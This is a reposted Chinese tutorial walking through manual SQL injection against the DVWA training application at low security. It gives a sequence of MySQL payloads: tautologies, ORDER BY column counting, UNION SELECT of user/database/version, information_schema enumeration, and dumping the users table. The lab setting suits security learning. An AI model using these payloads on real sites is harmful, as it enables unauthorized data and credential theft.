首页 > 数据库 > MySQL > 正文

DVWA之php+mysql手工注入

2020-03-22 18:29:44
字体:
来源:转载
供稿:网友
这篇文章介绍的内容是关于DVWA之php+mysql手工注入,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下

  1. dvwa安全级别为low,进入sql injection页面,提示输入user id,输入正确的id,将显示id first name,surname信息。

  2. 尝试输入"'",返回错误。存在注入点。

  3. 尝试遍历数据库表,提示输入的值为ID,初步判断为数字类型注入。尝试输入:1 or 1=1,尝试遍历数据库表。结果失败。


  1. 1 or 1=1遍历数据库表失败,猜测程序将此处看成了字符型,可尝试输入 1' or '1'='1 后遍历出数据库中所有内容。下面尝试结合各种不同语句,得到不同结果。

  2. 利用order by 语句查询,输入 1'order by 1 - - 页面显示正常,1'order by 2 - - 显示正常,1'order by 3 - - 报错,判断查询结果值为2列。(注意语句中- - 后边有空格,- -之间没有空格)

  3. 使用user(),database(),version()三个内置函数得到数据库的账户名,数据库名称,数据库版本信息,首先参数注入 1' and 1=2 union select 1,2 - -(- -之间无空格,- -后有空格)。得出first name处显示为查询结果第一列的值,surname处显示为查询结果第二列的值。

  4. 在得知显示之后,使用user(),database(),version(),语句 1' and 1=2 union select user(),database() - - 得到数据库用户以及数据库名称。链接数据库的用户为root@localhost,数据库名称为dvwa。

  5. 通过注入1' and 1=2 union select version(),database() - - 得到数据库版本为:5.0.90-community-nt。

  6. 通过注入:1'and 1=2 union select 1,@@global.version_compile_os from mysql.user –- 获得操作系统信息为win32.

  7. 通过注入: 1' and 1=2 union select 1,schema_name from information_schema.schemata - - 查询mysql数据库,所有数据库名字。这里利用了mysql默认数据库information_scehma,该数据库存储了mysql所有数据库和表的信息。

  8. 通过注入 1' and exists(select * from users) - - 猜解dvwa数据库中表名(该语句中表名为users,该表实际没有存放用户名和密码)

  9. 猜解字段名:1' and exists(select 字段名 from 表名) - - ,这里实际测试字段名first_name和last_name。实际语句 1' and exists(select first_name from users) - -以及1' and exists(select last_name from users) - - 猜解字段名。

  10. 爆出数据库中字段内容。 1' and 1=2 union select first_name,last_name from users - - 这里其实如果是存放管理员账户的表,那么用户名和密码就可以爆出了。

源代码

相关推荐:

阅读DVWA系统代码之config.inc.php

以上就是DVWA之php+mysql手工注入的详细内容,更多请关注 其它相关文章!

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表